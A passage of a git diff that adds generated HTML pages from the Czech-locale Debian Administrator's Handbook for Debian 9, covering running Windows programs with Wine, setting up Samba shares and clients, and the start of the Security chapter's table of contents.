+			These architectures may be an appropriate choice for Falcot Corp administrators, especially for a firewall (the kernel supports three different firewalls: IPF, IPFW, PF) or for a NAS (network attached storage system, for which the ZFS filesystem has been tested and approved).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.master-plan.html"><strong>Předcházející</strong>2.2. Master Plan</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian.html"><strong>Další</strong>2.4. Why the Debian Distribution?</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-emulation.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-emulation.html
new file mode 100644
index 000000000..6b113a579
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-emulation.html
@@ -0,0 +1,201 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.9. Emulating Windows: Wine</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.office-suites.html"
+        title="13.8. Office Suites" /><link
+        rel="next"
+        href="sect.rtc-clients.html"
+        title="13.10. Real-Time Communications software" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.windows-emulation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.office-suites.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-clients.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.windows-emulation"></a>13.9. Emulating Windows: Wine</h2></div></div></div><a
+          id="id-1.16.12.2"
+          class="indexterm"></a><a
+          id="id-1.16.12.3"
+          class="indexterm"></a><div
+          class="para">
+			In spite of all the previously mentioned efforts, there are still a number of tools without a Linux equivalent, or for which the original version is absolutely required. This is where Windows emulation systems come in handy. The most well-known among them is Wine. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://www.winehq.org/">https://www.winehq.org/</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMPLEMENTS</em></span> CrossOver Linux</strong></p></div></div></div><div
+            class="para">
+			<span
+              class="emphasis"><em>CrossOver</em></span>, produced by CodeWeavers, is a set of enhancements to Wine that broadens the available set of emulated features to a point at which Microsoft Office becomes fully usable. Some of the enhancements are periodically merged into Wine. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.codeweavers.com/products/">https://www.codeweavers.com/products/</a></div>
+		</div><a
+            id="id-1.16.12.5.3"
+            class="indexterm"></a><a
+            id="id-1.16.12.5.4"
+            class="indexterm"></a></div><div
+          class="para">
+			However, one should keep in mind that it is only a solution among others, and the problem can also be tackled with a virtual machine or VNC; both of these solutions are detailed in the sidebars <a
+            class="xref"
+            href="sect.windows-emulation.html#sidebar.virtual-machines"><span
+              class="emphasis"><em>ALTERNATIVE</em></span> Virtual machines</a> and <a
+            class="xref"
+            href="sect.windows-emulation.html#sidebar.wts-or-vnc"><span
+              class="emphasis"><em>ALTERNATIVE</em></span> <span
+              class="foreignphrase"><em
+                class="foreignphrase">Windows Terminal Server</em></span> or VNC</a>.
+		</div><div
+          class="para">
+			Let us start with a reminder: emulation allows executing a program (developed for a target system) on a different host system. The emulation software uses the host system, where the application runs, to imitate the required features of the target system.
+		</div><a
+          id="id-1.16.12.8"
+          class="indexterm"></a><div
+          class="para">
+			Now let's install the required packages (<span
+            class="pkg pkg">ttf-mscorefonts-installer</span> is in the contrib section):
+		</div><pre
+          class="screen">
+<code
+            class="computeroutput"># </code><strong
+            class="userinput"><code>apt install wine ttf-mscorefonts-installer</code></strong></pre><a
+          id="id-1.16.12.11"
+          class="indexterm"></a><div
+          class="para">
+			On a 64 bit (amd64) system, if your Windows applications are 32 bit applications, then you will have to enable multi-arch to be able to install wine32 from the i386 architecture (see <a
+            class="xref"
+            href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5 – „Multi-Arch Support“</a>).
+		</div><div
+          class="para">
+			The user then needs to run <code
+            class="command">winecfg</code> and configure which (Debian) locations are mapped to which (Windows) drives. <code
+            class="command">winecfg</code> has some sane defaults and can autodetect some more drives; note that even if you have a dual-boot system, you should not point the <code
+            class="literal">C:</code> drive at where the Windows partition is mounted in Debian, as Wine is likely to overwrite some of the data on that partition, making Windows unusable. Other settings can be kept to their default values. To run Windows programs, you will first need to install them by running their (Windows) installer under Wine, with a command such as <code
+            class="command">wine <em
+              class="replaceable">.../setup.exe</em></code>; once the program is installed, you can run it with <code
+            class="command">wine <em
+              class="replaceable">.../program.exe</em></code>. The exact location of the <code
+            class="filename">program.exe</code> file depends on where the <code
+            class="literal">C:</code> drive is mapped; in many cases, however, simply running <code
+            class="command">wine <em
+              class="replaceable">program</em></code> will work, since the program is usually installed in a location where Wine will look for it by itself.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Working around a winecfg failure</strong></p></div></div></div><div
+            class="para">
+			In some cases, <code
+              class="command">winecfg</code> (which is just a wrapper) might fail. As a work-around, it is possible to try to run the underlying command manually: <code
+              class="command">wine64 /usr/lib/x86_64-linux-gnu/wine/wine/winecfg.exe.so</code> or <code
+              class="command">wine32 /usr/lib/i386-linux-gnu/wine/wine/winecfg.exe.so</code>.
+		</div></div><div
+          class="para">
+			Note that you should not rely on Wine (or similar solutions) without actually testing the particular software: only a real-use test will determine conclusively whether emulation is fully functional.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.virtual-machines"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Virtual machines</strong></p></div></div></div><div
+            class="para">
+			An alternative to emulating Microsoft's operating system is to actually run it in a virtual machine that emulates a full hardware machine. This allows running any operating system. <a
+              class="xref"
+              href="advanced-administration.html">12 – „<em>Advanced Administration</em>“</a> describes several virtualization systems, most notably Xen and KVM (but also QEMU, VMWare and Bochs).
+		</div></div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.wts-or-vnc"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> <span
+                      class="foreignphrase"><em
+                        class="foreignphrase">Windows Terminal Server</em></span> or VNC</strong></p></div></div></div><div
+            class="para">
+			Yet another possibility is to remotely run the legacy Windows applications on a central server with <span
+              class="emphasis"><em>Windows Terminal Server</em></span> and access the application from Linux machines using <span
+              class="emphasis"><em>rdesktop</em></span>. This is a Linux client for the RDP protocol (<span
+              class="emphasis"><em>Remote Desktop Protocol</em></span>) that <span
+              class="foreignphrase"><em
+                class="foreignphrase">Windows NT/2000 Terminal Server</em></span> uses to display desktops on remote machines.
+		</div><a
+            id="id-1.16.12.17.3"
+            class="indexterm"></a><a
+            id="id-1.16.12.17.4"
+            class="indexterm"></a><a
+            id="id-1.16.12.17.5"
+            class="indexterm"></a><div
+            class="para">
+			The VNC software provides similar features, with the added benefit of also working with many operating systems. Linux VNC clients and servers are described in <a
+              class="xref"
+              href="sect.remote-login.html">9.2 – „Remote Login“</a>.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.office-suites.html"><strong>Předcházející</strong>13.8. Office Suites</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-clients.html"><strong>Další</strong>13.10. Real-Time Communications software</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-file-server-with-samba.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-file-server-with-samba.html
new file mode 100644
index 000000000..1cadb27dd
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-file-server-with-samba.html
@@ -0,0 +1,399 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.5. Setting Up Windows Shares with Samba</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.nfs-file-server.html"
+        title="11.4. NFS File Server" /><link
+        rel="next"
+        href="sect.http-ftp-proxy.html"
+        title="11.6. HTTP/FTP Proxy" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.windows-file-server-with-samba.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.nfs-file-server.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-ftp-proxy.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.windows-file-server-with-samba"></a>11.5. Setting Up Windows Shares with Samba</h2></div></div></div><div
+          class="para">
+			Samba is a suite of tools handling the SMB protocol (also known as “CIFS”) on Linux. This protocol is used by Windows for network shares and shared printers.
+		</div><a
+          id="id-1.14.8.3"
+          class="indexterm"></a><a
+          id="id-1.14.8.4"
+          class="indexterm"></a><a
+          id="id-1.14.8.5"
+          class="indexterm"></a><a
+          id="id-1.14.8.6"
+          class="indexterm"></a><a
+          id="id-1.14.8.7"
+          class="indexterm"></a><div
+          class="para">
+			Samba can also act as an Windows domain controller. This is an outstanding tool for ensuring seamless integration of Linux servers and the office desktop machines still running Windows.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.8.9"></a>11.5.1. Samba Server</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">samba</span> package contains the main two servers of Samba 4, <code
+              class="command">smbd</code> and <code
+              class="command">nmbd</code>.
+			</div><a
+            id="id-1.14.8.9.3"
+            class="indexterm"></a><a
+            id="id-1.14.8.9.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> Going further</strong></p></div></div></div><div
+              class="para">
+				The Samba server is extremely configurable and versatile, and can address a great many different use cases matching very different requirements and network architectures. This book only focuses on the use case where Samba is used as a standalone server, but it can also be a NT4 Domain Controller or a full Active Directory Domain Controller, or a simple member of an existing domain (which could be a managed by a Windows server).
+			</div><a
+              id="id-1.14.8.9.5.3"
+              class="indexterm"></a><a
+              id="id-1.14.8.9.5.4"
+              class="indexterm"></a><div
+              class="para">
+				The <span
+                class="pkg pkg">samba-doc</span> package contains a wealth of commented example files in <code
+                class="filename">/usr/share/doc/samba-doc/examples/</code>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Authenticating with a Windows Server</strong></p></div></div></div><div
+              class="para">
+				Winbind gives system administrators the option of using a Windows server as an authentication server. Winbind also integrates cleanly with PAM and NSS. This allows setting up Linux machines where all users of a Windows domain automatically get an account.
+			</div><a
+              id="id-1.14.8.9.6.3"
+              class="indexterm"></a><div
+              class="para">
+				More information can be found in the <code
+                class="filename">/usr/share/doc/samba-doc/examples/pam_winbind/</code> directory.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.9.7"></a>11.5.1.1. Configuring with <code
+                      class="command">debconf</code></h4></div></div></div><div
+              class="para">
+					The package sets up a minimal configuration during the initial installation but you should really run <code
+                class="command">dpkg-reconfigure samba-common</code> to adapt it:
+				</div><div
+              class="para">
+					The first piece of required information is the name of the workgroup where the Samba server will belong (the answer is <code
+                class="literal">FALCOTNET</code> in our case).
+				</div><div
+              class="para">
+					The package also proposes identifying the WINS server from the information provided by the DHCP daemon. The Falcot Corp administrators rejected this option, since they intend to use the Samba server itself as the WINS server.
+				</div><a
+              id="id-1.14.8.9.7.5"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.9.8"></a>11.5.1.2. Configuring Manually</h4></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.8.9.8.2"></a>11.5.1.2.1. Changes to <code
+                        class="filename">smb.conf</code></h5></div></div></div><div
+                class="para">
+						The requirements at Falcot require other options to be modified in the <code
+                  class="filename">/etc/samba/smb.conf</code> configuration file. The following excerpts summarize the changes that were effected in the <code
+                  class="literal">[global]</code> section.
+					</div><pre
+                class="programlisting">
+[global]
+
+## Browsing/Identification ###
+
+# Change this to the workgroup/NT-domain name your Samba server will part of
+   workgroup = FALCOTNET
+
+# Windows Internet Name Serving Support Section:
+# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
+   wins support = yes <span
+                  id="smb.conf.wins"><img
+                    class="callout"
+                    src="Common_Content/images/1.png"
+                    alt="1" /></span>
+
+[...]
+
+####### Authentication #######
+
+# Server role. Defines in which mode Samba will operate. Possible
+# values are "standalone server", "member server", "classic primary
+# domain controller", "classic backup domain controller", "active
+# directory domain controller". 
+#
+# Most people will want "standalone sever" or "member server".
+# Running as "active directory domain controller" will require first
+# running "samba-tool domain provision" to wipe databases and create a
+# new domain.
+   server role = standalone server
+
+# "security = user" is always a good idea. This will require a Unix account
+# in this server for every user accessing the server.
+   security = user <span
+                  id="smb.conf.security"><img
+                    class="callout"
+                    src="Common_Content/images/2.png"
+                    alt="2" /></span>
+
+[...]
+</pre><div
+                class="calloutlist"><table
+                  border="0"
+                  summary="Callout list"><tr><td
+                      width="5%"
+                      valign="top"
+                      align="left"><p><a
+                          href="#smb.conf.wins"><img
+                            class="callout"
+                            src="Common_Content/images/1.png"
+                            alt="1" /></a> </p></td><td
+                      valign="top"
+                      align="left"><div
+                        class="para">
+								Indicates that Samba should act as a Netbios name server (WINS) for the local network.
+							</div></td></tr><tr><td
+                      width="5%"
+                      valign="top"
+                      align="left"><p><a
+                          href="#smb.conf.security"><img
+                            class="callout"
+                            src="Common_Content/images/2.png"
+                            alt="2" /></a> </p></td><td
+                      valign="top"
+                      align="left"><div
+                        class="para">
+								This is the default value for this parameter; however, since it is central to the Samba configuration, filling it explicitly is recommended. Each user must authenticate before accessing any share.
+							</div></td></tr></table></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.8.9.8.3"></a>11.5.1.2.2. Adding Users</h5></div></div></div><div
+                class="para">
+						Each Samba user needs an account on the server; the Unix accounts must be created first, then the user needs to be registered in Samba's database. The Unix step is done quite normally (using <code
+                  class="command">adduser</code> for instance).
+					</div><div
+                class="para">
+						Adding an existing user to the Samba database is a matter of running the <code
+                  class="command">smbpasswd -a <em
+                    class="replaceable">user</em></code> command; this command asks for the password interactively.
+					</div><div
+                class="para">
+						A user can be deleted with the <code
+                  class="command">smbpasswd -x <em
+                    class="replaceable">user</em></code> command. A Samba account can also be temporarily disabled (with <code
+                  class="command">smbpasswd -d <em
+                    class="replaceable">user</em></code>) and re-enabled later (with <code
+                  class="command">smbpasswd -e <em
+                    class="replaceable">user</em></code>).
+					</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.8.10"></a>11.5.2. Samba Client</h3></div></div></div><div
+            class="para">
+				The client features in Samba allow a Linux machine to access Windows shares and shared printers. The required programs are available in the <span
+              class="pkg pkg">cifs-utils</span> and <span
+              class="pkg pkg">smbclient</span> packages.
+			</div><a
+            id="id-1.14.8.10.3"
+            class="indexterm"></a><a
+            id="id-1.14.8.10.4"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.10.5"></a>11.5.2.1. The <code
+                      class="command">smbclient</code> Program</h4></div></div></div><div
+              class="para">
+					The <code
+                class="command">smbclient</code> program queries SMB servers. It accepts a <code
+                class="literal">-U <em
+                  class="replaceable">user</em></code> option, for connecting to the server under a specific identity. <code
+                class="command">smbclient //<em
+                  class="replaceable">server</em>/<em
+                  class="replaceable">share</em></code> accesses the share in an interactive way similar to the command-line FTP client. <code
+                class="command">smbclient -L <em
+                  class="replaceable">server</em></code> lists all available (and visible) shares on a server.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.10.6"></a>11.5.2.2. Mounting Windows Shares</h4></div></div></div><div
+              class="para">
+					The <code
+                class="command">mount</code> command allows mounting a Windows share into the Linux filesystem hierarchy (with the help of <code
+                class="command">mount.cifs</code> provided by <span
+                class="pkg pkg">cifs-utils</span>).
+				</div><a
+              id="id-1.14.8.10.6.3"
+              class="indexterm"></a><a
+              id="id-1.14.8.10.6.4"
+              class="indexterm"></a><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.8.10.6.5"></a><p
+                class="title"><strong>Příklad 11.24. Mounting a Windows share</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+mount -t cifs //arrakis/shared /shared \
+      -o credentials=/etc/smb-credentials
+</pre></div></div><div
+              class="para">
+					The <code
+                class="filename">/etc/smb-credentials</code> file (which must not be readable by users) has the following format:
+				</div><pre
+              class="programlisting">
+username = <em
+                class="replaceable">user</em>
+password = <em
+                class="replaceable">password</em></pre><div
+              class="para">
+					Other options can be specified on the command-line; their full list is available in the <span
+                class="citerefentry"><span
+                  class="refentrytitle">mount.cifs</span>(1)</span> manual page. Two options in particular can be interesting: <code
+                class="literal">uid</code> and <code
+                class="literal">gid</code> allow forcing the owner and group of files available on the mount, so as not to restrict access to root.
+				</div><div
+              class="para">
+					A mount of a Windows share can also be configured in <code
+                class="filename">/etc/fstab</code>:
+				</div><pre
+              class="programlisting">
+//<em
+                class="replaceable">server</em>/shared /shared cifs credentials=/etc/smb-credentials
+</pre><div
+              class="para">
+					Unmounting a SMB/CIFS share is done with the standard <code
+                class="command">umount</code> command.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.8.10.7"></a>11.5.2.3. Printing on a Shared Printer</h4></div></div></div><div
+              class="para">
+					CUPS is an elegant solution for printing from a Linux workstation to a printer shared by a Windows machine. When the <span
+                class="pkg pkg">smbclient</span> is installed, CUPS allows installing Windows shared printers automatically.
+				</div><a
+              id="id-1.14.8.10.7.3"
+              class="indexterm"></a><div
+              class="para">
+					Here are the required steps:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							Enter the CUPS configuration interface: <code
+                      class="literal">http://localhost:631/admin</code>
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Click on “Add Printer”.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Choose the printer device, pick “Windows Printer via SAMBA”.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Enter the connection URI for the network printer. It should look like the following:
+						</div><div
+                    class="para">
+							<code
+                      class="literal">smb://<em
+                        class="replaceable">user</em>:<em
+                        class="replaceable">password</em>@<em
+                        class="replaceable">server</em>/<em
+                        class="replaceable">printer</em></code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Enter the name that will uniquely identify this printer. Then enter the description and location of the printer. Those are the strings that will be shown to end users to help them identify the printers.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Indicate the manufacturer/model of the printer, or directly provide a working printer description file (PPD).
+						</div></li></ul></div><div
+              class="para">
+					Voilà, the printer is operational!
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.nfs-file-server.html"><strong>Předcházející</strong>11.4. NFS File Server</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-ftp-proxy.html"><strong>Další</strong>11.6. HTTP/FTP Proxy</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/security.html b/publish/cs-CZ/Debian/9/html/debian-handbook/security.html
new file mode 100644
index 000000000..8e46a8745
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/security.html
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 14. Security</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.rtc-clients.html"
+        title="13.10. Real-Time Communications software" /><link
+        rel="next"
+        href="sect.firewall-packet-filtering.html"
+        title="14.2. Firewall or Packet Filtering" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/security.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-clients.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.firewall-packet-filtering.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="security"></a>Kapitola 14. Security</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="security.html#sect.defining-security-policy">14.1. Defining a Security Policy</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.firewall-packet-filtering.html">14.2. Firewall or Packet Filtering</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.netfilter">14.2.1. Netfilter Behavior</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.iptables">14.2.2. Syntax of <code
+                        class="command">iptables</code> and <code
+                        class="command">ip6tables</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.creating-rules">14.2.3. Creating Rules</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.install-rules-at-boot">14.2.4. Installing the Rules at Each Boot</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.supervision.html">14.3. Supervision: Prevention, Detection, Deterrence</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#sect.logcheck">14.3.1. Monitoring Logs with <code
+                        class="command">logcheck</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#sect.monitoring-activity">14.3.2. Monitoring Activity</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#id-1.17.6.6">14.3.3. Detecting Changes</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#sect.intrusion-detection">14.3.4. Detecting Intrusion (IDS/NIDS)</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.apparmor.html">14.4. Introduction to AppArmor</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html#sect.apparmor-principles">14.4.1. Principles</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html#sect.apparmor-setup">14.4.2. Enabling AppArmor and managing AppArmor profiles</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html#sect.apparmor-new-profile">14.4.3. Creating a new profile</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.selinux.html">14.5. Introduction to SELinux</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-principles">14.5.1. Principles</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-setup">14.5.2. Setting Up SELinux</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-management">14.5.3. Managing an SELinux System</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-custom-rules">14.5.4. Adapting the Rules</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.other-security-considerations.html">14.6. Other Security-Related Considerations</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#id-1.17.9.3">14.6.1. Inherent Risks of Web Applications</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#id-1.17.9.4">14.6.2. Knowing What To Expect</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#sect.choosing-the-software-wisely">14.6.3. Choosing the Software Wisely</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#sect.managing-a-machine-as-a-whole">14.6.4. Managing a Machine as a Whole</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#sect.users-are-players">14.6.5. Users Are Players</a></span></dt><dt><span
+                    class="section"><a
